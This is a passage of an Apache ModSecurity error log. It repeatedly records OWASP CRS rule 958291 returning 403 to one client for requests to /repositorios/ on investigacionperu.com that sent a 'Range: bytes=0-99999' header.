"OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7wgAAAIY"] [Mon Feb 17 10:36:06.958652 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36438] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZgJrayd7JfpBdXs7wwAAAJU"] [Mon Feb 17 10:36:07.056817 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36440] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7xAAAAJA"] [Mon Feb 17 10:36:07.164797 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36442] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7xQAAAJQ"] [Mon Feb 17 10:36:07.259846 2025] [:error] [pid 10662:tid 140634132244224] [client 190.102.150.245:36444] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZ__97XY8xax64gWTmQAAABI"] [Mon Feb 17 10:36:07.356737 2025] [:error] [pid 10663:tid 140634081888000] [client 190.102.150.245:36446] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZ7Ucx1xj5z0EGUpRkwAAAFg"] [Mon Feb 17 10:36:07.452861 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36448] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7xgAAAIQ"] [Mon Feb 17 10:36:07.550351 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36450] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7xwAAAIU"] [Mon Feb 17 10:36:07.648071 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36452] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7yAAAAJY"] [Mon Feb 17 10:36:07.745715 2025] [:error] [pid 10664:tid 140634132244224] [client 190.102.150.245:36454] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7yQAAAJI"] [Mon Feb 17 10:36:07.841480 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:36456] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7ygAAAIA"] [Mon Feb 17 10:36:07.945937 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36458] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXZwJrayd7JfpBdXs7ywAAAI8"] [Mon Feb 17 10:36:08.048135 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36460] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs7zAAAAJM"] [Mon Feb 17 10:36:08.146455 2025] [:error] [pid 10664:tid 140634224563968] [client 190.102.150.245:36462] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs7zQAAAIc"] [Mon Feb 17 10:36:08.243263 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36464] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs7zgAAAIs"] [Mon Feb 17 10:36:08.342066 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36466] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs7zwAAAIY"] [Mon Feb 17 10:36:08.438753 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36468] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs70AAAAJU"] [Mon Feb 17 10:36:08.536295 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36470] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs70QAAAJA"] [Mon Feb 17 10:36:08.632535 2025] [:error] [pid 10662:tid 140634258134784] [client 190.102.150.245:36472] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaP_97XY8xax64gWTmgAAAAM"] [Mon Feb 17 10:36:08.730685 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36474] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs70gAAAJQ"] [Mon Feb 17 10:36:08.826614 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36476] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs70wAAAIQ"] [Mon Feb 17 10:36:08.924202 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36478] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaAJrayd7JfpBdXs71AAAAIU"] [Mon Feb 17 10:36:09.021173 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36480] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs71QAAAJY"] [Mon Feb 17 10:36:09.121333 2025] [:error] [pid 10664:tid 140634132244224] [client 190.102.150.245:36482] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs71gAAAJI"] [Mon Feb 17 10:36:09.219002 2025] [:error] [pid 10664:tid 140634090280704] [client 190.102.150.245:36484] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs71wAAAJc"] [Mon Feb 17 10:36:09.319088 2025] [:error] [pid 10664:tid 140634157422336] [client 190.102.150.245:36486] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs72AAAAI8"] [Mon Feb 17 10:36:09.416551 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36488] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs72QAAAJM"] [Mon Feb 17 10:36:09.516467 2025] [:error] [pid 10664:tid 140634224563968] [client 190.102.150.245:36490] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs72gAAAIc"] [Mon Feb 17 10:36:09.613378 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36492] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs72wAAAIs"] [Mon Feb 17 10:36:09.711117 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36494] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs73AAAAIY"] [Mon Feb 17 10:36:09.808552 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36496] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaavoDupyaoF2tAucugAAANM"] [Mon Feb 17 10:36:09.904885 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36498] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaQJrayd7JfpBdXs73QAAAJU"] [Mon Feb 17 10:36:10.002842 2025] [:error] [pid 10663:tid 140634107066112] [client 190.102.150.245:36500] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXarUcx1xj5z0EGUpRlAAAAFU"] [Mon Feb 17 10:36:10.099858 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36502] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaqvoDupyaoF2tAucuwAAAMM"] [Mon Feb 17 10:36:10.196434 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36504] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs73gAAAJA"] [Mon Feb 17 10:36:10.297056 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36506] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs73wAAAJQ"] [Mon Feb 17 10:36:10.393169 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36508] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs74AAAAIQ"] [Mon Feb 17 10:36:10.490292 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36510] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs74QAAAIU"] [Mon Feb 17 10:36:10.586419 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36512] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs74gAAAJY"] [Mon Feb 17 10:36:10.682970 2025] [:error] [pid 10664:tid 140634132244224] [client 190.102.150.245:36514] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXagJrayd7JfpBdXs74wAAAJI"] [Mon Feb 17 10:36:10.781148 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36516] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXaqvoDupyaoF2tAucvAAAANQ"] [Mon Feb 17 10:36:10.877829 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36518] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 